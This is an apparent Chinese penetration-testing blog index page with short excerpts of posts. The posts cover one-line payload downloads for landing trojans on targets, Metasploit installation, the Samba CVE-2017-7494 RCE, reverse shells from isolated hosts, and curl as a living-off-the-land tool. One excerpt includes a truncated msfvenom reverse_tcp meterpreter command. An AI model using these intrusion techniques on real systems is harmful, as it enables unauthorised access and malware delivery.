天道酬勤

Red Team

一句话下载payload总结-HackerGu‘s Blog

一句话下载payload总结

Gu阅读(31)评论(0)赞(0)

在渗透的过程中,令机器上线是一个重要的问题,其实最关键的一步就是如何将我们的木马文件上传到目标机器上。看了Micro8大佬的文章,收获颇多,在此做下记录。 利用vbs进行下载 无论是哪个版本的Windows,都支持vbs。 核心代码: se...

Centos下安装msf-HackerGu‘s Blog

Centos下安装msf

Gu阅读(15)评论(0)赞(0)

经常性更换服务器,所以导致某些工具,安来安去,不能每一次都重新查找安装教程,我还是得自己总结一下。 我的服务器呢是Centos7. 安装msf 官方提供的一键化安装脚本: curl https://raw.githubusercontent...

m0n0wall防火墙的安装配置-HackerGu‘s Blog

m0n0wall防火墙的安装配置

Gu阅读(21)评论(0)赞(0)

m0n0wall的镜像链接:https://pan.baidu.com/s/1soIw7cS1Tv180fbo2655UA 提取码:dpon 一、新建虚拟机 新建虚拟机我想大家都会,详细步骤我就不陈述了,接下来贴重点: 我们直接安装映像文件...

Samba远程代码执行漏洞(CVE-2017-7494)-HackerGu‘s Blog

Samba远程代码执行漏洞(CVE-2017-7494)

Gu阅读(35)评论(0)赞(1)

Samba远程代码执行漏洞(CVE-2017-7494) 一、漏洞描述 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4...

Msf和CS上线不出网的机器-HackerGu‘s Blog

Msf和CS上线不出网的机器

Gu阅读(74)评论(0)赞(0)

内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1...

Curl在渗透测试中的应用(LOLBAS)-HackerGu‘s Blog

Curl在渗透测试中的应用(LOLBAS)

Gu阅读(77)评论(2)赞(2)

Curl介绍 curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具。 curl可以用于处理远程服务器上的文件。 例如,我们可以在目标机器上利用curl下载远程服务器的木马文件...

专注黑客技术的研究

联系我们联系我们